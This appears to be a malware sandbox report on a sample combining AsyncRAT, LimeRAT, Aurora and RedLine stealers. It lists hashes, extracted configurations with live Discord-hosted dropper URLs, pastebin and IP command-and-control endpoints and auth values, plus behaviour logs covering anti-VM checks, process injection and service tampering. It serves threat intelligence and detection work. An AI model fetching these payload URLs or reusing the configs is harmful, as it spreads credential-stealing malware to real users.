asyncrat | 6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee

Resubmissions

21-11-2023 02:40

231121-c57v5sbf69 10

21-11-2023 02:31

231121-cz55cscc61 10

Analysis

max time kernel
59s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
21-11-2023 02:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
Size

18.0MB
MD5

ab572c3d1e6ecab24e20a1f858eb57a1
SHA1

76fcdcb011b4edf3f5178ab0e08033d89d628902
SHA256

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee
SHA512

7354a60e927ddbf44e47d7febb068b3792ade2a9dd96f6ea07d6bb036fff4eaaf19977649e9784c80ba61d3655598e0d82aed333b2cd9610aa35babfb9a7d7bf
SSDEEP

393216:ARFbqnGONtcDEo7nKhgqgLsqpbe9+MxAa+kiUTg5Dqw:ArU13o7ZLsAH5Sdw

Score

10^/10

asyncrat aurora limerat redline @miroskati new evasion infostealer rat stealer upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe

Extracted

Family

aurora

37.220.87.13:8081

Extracted

Family

limerat

Attributes

aes_key
123
antivm
true
c2_url
https://pastebin.com/raw/mchxnAbT
delay
80
download_payload
false
install
true
install_name
WindosCert.exe
main_folder
AppData
pin_spread
true
sub_folder
\
usb_spread
true

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

NEW

Mutex

ihouhh

Attributes

delay
80
install
true
install_file
UpdateChromeDay.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/mchxnAbT

aes.plain

Extracted

Family

redline

185.215.113.69:15544

62.204.41.141:24758

45.15.157.131:36457

Attributes

auth_value
971353143dce4409844e1f4f0f5f7af8

Extracted

Family

redline

Botnet

@Miroskati

ofriaransim.shop:80

Attributes

auth_value
384ebbf9bd4d7e80bf3269909b298f87

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

directxc.exe

description	pid	Process	procid_target
PID 4524 created 3156	4524	directxc.exe	51
PID 4524 created 3156	4524	directxc.exe	51
PID 4524 created 3156	4524	directxc.exe	51
PID 4524 created 3156	4524	directxc.exe	51
PID 4524 created 3156	4524	directxc.exe	51
PID 4524 created 3156	4524	directxc.exe	51

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/files/0x0006000000022ceb-59.dat	asyncrat
behavioral2/memory/556-64-0x0000000000EC0000-0x0000000000EE2000-memory.dmp	asyncrat
behavioral2/files/0x0006000000022ceb-63.dat	asyncrat
behavioral2/files/0x0006000000022ceb-49.dat	asyncrat

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	directxw.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	directxw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	directxw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	directxw.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	directxw.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
72	1644	powershell.exe
79	5000	powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

directxc.exe

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	directxc.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe

Executes dropped EXE 11 IoCs

Processes:

ChromeUpdate.exedirectx.exedirectxc.exedirectxCrack.exedirectxERR.exedirectxMer.exedirectxUp.exedirectxw.exesc.exeCypher.exeupdater.exe

pid	Process
4808	ChromeUpdate.exe
3140	directx.exe
4524	directxc.exe
2072	directxCrack.exe
2388	directxERR.exe
556	directxMer.exe
2996	directxUp.exe
2344	directxw.exe
2056	sc.exe
4000	Cypher.exe
548	updater.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000a000000022bfd-8.dat	upx
behavioral2/files/0x000a000000022bfd-12.dat	upx
behavioral2/files/0x000a000000022bfd-10.dat	upx
behavioral2/memory/4808-27-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-162-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-195-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-227-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-324-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-401-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-507-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx
behavioral2/memory/4808-606-0x0000000000940000-0x0000000000CC4000-memory.dmp	upx

VMProtect packed file 7 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/3276-2-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral2/memory/3276-1-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral2/files/0x0006000000022ced-70.dat	vmprotect
behavioral2/files/0x0006000000022ced-81.dat	vmprotect
behavioral2/memory/3276-99-0x0000000000400000-0x000000000273B000-memory.dmp	vmprotect
behavioral2/files/0x0006000000022ced-82.dat	vmprotect
behavioral2/memory/2344-155-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect

Suspicious use of SetThreadContext 5 IoCs

Processes:

directx.exedirectxERR.exedirectxUp.exesc.exedirectxc.exe

description	pid	Process	procid_target
PID 3140 set thread context of 5076	3140	directx.exe	112
PID 2388 set thread context of 2928	2388	directxERR.exe	114
PID 2996 set thread context of 2916	2996	directxUp.exe	115
PID 2056 set thread context of 1384	2056	sc.exe	121
PID 4524 set thread context of 2032	4524	directxc.exe	152

Drops file in Program Files directory 1 IoCs

Processes:

directxc.exe

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	directxc.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2056	sc.exe
3076	sc.exe
2316	sc.exe
1612	sc.exe
2612	sc.exe
1016	sc.exe
3028	sc.exe
2964	sc.exe
260	sc.exe
2584	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exe

pid	Process
3276	schtasks.exe
1100	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
5036	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
4676	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exepowershell.exedirectxw.exepowershell.exepowershell.exedirectxc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeWerFault.exepowershell.exe

pid	Process
3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
2216	powershell.exe
2216	powershell.exe
2344	directxw.exe
2344	directxw.exe
2344	directxw.exe
2344	directxw.exe
2480	powershell.exe
2480	powershell.exe
2216	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
4524	directxc.exe
4524	directxc.exe
2480	powershell.exe
180	powershell.exe
180	powershell.exe
2344	directxw.exe
2344	directxw.exe
180	powershell.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
4524	directxc.exe
3468	powershell.exe
3468	powershell.exe
3468	powershell.exe
1644	powershell.exe
1644	powershell.exe
1644	powershell.exe
4724	powershell.EXE
4724	powershell.EXE
3672	powershell.EXE
3672	powershell.EXE
4724	powershell.EXE
3672	powershell.EXE
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
180	WerFault.exe
180	WerFault.exe
180	WerFault.exe
3624	powershell.exe
3624	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	180	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeShutdownPrivilege	3216	powercfg.exe
Token: SeCreatePagefilePrivilege	3216	powercfg.exe
Token: SeShutdownPrivilege	4036	powercfg.exe
Token: SeCreatePagefilePrivilege	4036	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe
Token: SeCreatePagefilePrivilege	3100	powershell.exe
Token: SeBackupPrivilege	3100	powershell.exe
Token: SeRestorePrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeSystemEnvironmentPrivilege	3100	powershell.exe
Token: SeRemoteShutdownPrivilege	3100	powershell.exe
Token: SeUndockPrivilege	3100	powershell.exe
Token: SeManageVolumePrivilege	3100	powershell.exe
Token: 33	3100	powershell.exe
Token: 34	3100	powershell.exe
Token: 35	3100	powershell.exe
Token: 36	3100	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe
Token: SeCreatePagefilePrivilege	3100	powershell.exe
Token: SeBackupPrivilege	3100	powershell.exe
Token: SeRestorePrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeSystemEnvironmentPrivilege	3100	powershell.exe
Token: SeRemoteShutdownPrivilege	3100	powershell.exe
Token: SeUndockPrivilege	3100	powershell.exe
Token: SeManageVolumePrivilege	3100	powershell.exe
Token: 33	3100	powershell.exe
Token: 34	3100	powershell.exe
Token: 35	3100	powershell.exe
Token: 36	3100	powershell.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exeCypher.exedirectx.exedirectxERR.exedirectxUp.exesc.execmd.execmd.exedirectxw.exe

description	pid	Process	procid_target
PID 3276 wrote to memory of 2216	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	96
PID 3276 wrote to memory of 2216	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	96
PID 3276 wrote to memory of 2216	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	96
PID 3276 wrote to memory of 4808	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	98
PID 3276 wrote to memory of 4808	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	98
PID 3276 wrote to memory of 3140	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	99
PID 3276 wrote to memory of 3140	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	99
PID 3276 wrote to memory of 3140	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	99
PID 3276 wrote to memory of 4524	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	101
PID 3276 wrote to memory of 4524	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	101
PID 3276 wrote to memory of 2072	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	102
PID 3276 wrote to memory of 2072	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	102
PID 3276 wrote to memory of 2072	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	102
PID 3276 wrote to memory of 2388	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	104
PID 3276 wrote to memory of 2388	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	104
PID 3276 wrote to memory of 2388	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	104
PID 3276 wrote to memory of 556	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	105
PID 3276 wrote to memory of 556	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	105
PID 3276 wrote to memory of 556	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	105
PID 3276 wrote to memory of 2996	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	106
PID 3276 wrote to memory of 2996	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	106
PID 3276 wrote to memory of 2996	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	106
PID 3276 wrote to memory of 2344	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	107
PID 3276 wrote to memory of 2344	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	107
PID 3276 wrote to memory of 2344	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	107
PID 3276 wrote to memory of 2056	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	138
PID 3276 wrote to memory of 2056	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	138
PID 3276 wrote to memory of 2056	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	138
PID 3276 wrote to memory of 4000	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	118
PID 3276 wrote to memory of 4000	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	118
PID 3276 wrote to memory of 4000	3276	6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe	118
PID 4000 wrote to memory of 4472	4000	Cypher.exe	117
PID 4000 wrote to memory of 4472	4000	Cypher.exe	117
PID 4000 wrote to memory of 4472	4000	Cypher.exe	117
PID 4000 wrote to memory of 700	4000	Cypher.exe	116
PID 4000 wrote to memory of 700	4000	Cypher.exe	116
PID 4000 wrote to memory of 700	4000	Cypher.exe	116
PID 3140 wrote to memory of 5076	3140	directx.exe	112
PID 3140 wrote to memory of 5076	3140	directx.exe	112
PID 3140 wrote to memory of 5076	3140	directx.exe	112
PID 3140 wrote to memory of 5076	3140	directx.exe	112
PID 3140 wrote to memory of 5076	3140	directx.exe	112
PID 2388 wrote to memory of 2928	2388	directxERR.exe	114
PID 2388 wrote to memory of 2928	2388	directxERR.exe	114
PID 2388 wrote to memory of 2928	2388	directxERR.exe	114
PID 2388 wrote to memory of 2928	2388	directxERR.exe	114
PID 2388 wrote to memory of 2928	2388	directxERR.exe	114
PID 2996 wrote to memory of 2916	2996	directxUp.exe	115
PID 2996 wrote to memory of 2916	2996	directxUp.exe	115
PID 2996 wrote to memory of 2916	2996	directxUp.exe	115
PID 2996 wrote to memory of 2916	2996	directxUp.exe	115
PID 2996 wrote to memory of 2916	2996	directxUp.exe	115
PID 2056 wrote to memory of 1384	2056	sc.exe	121
PID 2056 wrote to memory of 1384	2056	sc.exe	121
PID 2056 wrote to memory of 1384	2056	sc.exe	121
PID 2056 wrote to memory of 1384	2056	sc.exe	121
PID 2056 wrote to memory of 1384	2056	sc.exe	121
PID 4472 wrote to memory of 1964	4472	cmd.exe	123
PID 4472 wrote to memory of 1964	4472	cmd.exe	123
PID 4472 wrote to memory of 1964	4472	cmd.exe	123
PID 700 wrote to memory of 2480	700	cmd.exe	122
PID 700 wrote to memory of 2480	700	cmd.exe	122
PID 700 wrote to memory of 2480	700	cmd.exe	122
PID 2344 wrote to memory of 4220	2344	directxw.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3156
- C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe
